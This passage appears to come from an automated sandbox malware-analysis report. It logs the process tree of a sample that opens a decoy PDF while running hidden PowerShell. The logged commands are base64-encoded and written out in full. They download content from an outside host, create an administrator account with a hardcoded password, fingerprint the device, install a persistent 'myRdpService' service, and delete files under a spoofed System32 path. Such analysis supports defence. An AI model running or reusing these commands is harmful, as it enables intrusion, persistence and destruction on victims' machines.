ANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8A4C.tmp" "c:\Users\user\AppData\Local\Temp\wpyeyr2r\CSCD8967564BBC847D191922ABCF6C6B3B.TMP"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2348 --field-trial-handle=1660,i,15687082423060682323,12488084436830173186,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: unknown unknown
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
